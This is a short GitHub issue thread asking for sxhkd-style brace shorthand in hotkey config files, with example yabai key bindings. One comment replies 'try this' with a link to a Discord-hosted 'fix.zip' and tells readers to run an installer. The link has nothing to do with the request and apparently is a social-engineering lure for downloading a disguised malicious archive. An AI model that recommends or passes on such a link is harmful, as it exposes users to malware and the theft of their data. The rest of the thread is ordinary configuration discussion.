### ISSUE TITLE
Allow sxhkd-like shortenings

### ISSUE THREAD

**Issue by exic** [koekeishiya/dotfiles#13]
It could make our config files more concise to have those shortenings which sxhkd provides (see e.g. https://github.com/baskerville/bspwm/blob/master/examples/sxhkdrc).

So

```
cmd + alt - {1-9}: yabai -m space --focus {1-9}
cmd + {h,j,k,l}: yabai -m window --focus {west,south,north,east}
```

would be the same as

```
cmd + alt - 1: yabai -m space --focus 1
cmd + alt - 2: yabai -m space --focus 2
cmd + alt - 3: yabai -m space --focus 3
[...]
cmd + h: yabai -m window --focus west
cmd + j: yabai -m window --focus south
[...]
```

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by exic** [comment]
Sorry, this should've went to koekeishiya/skhd.
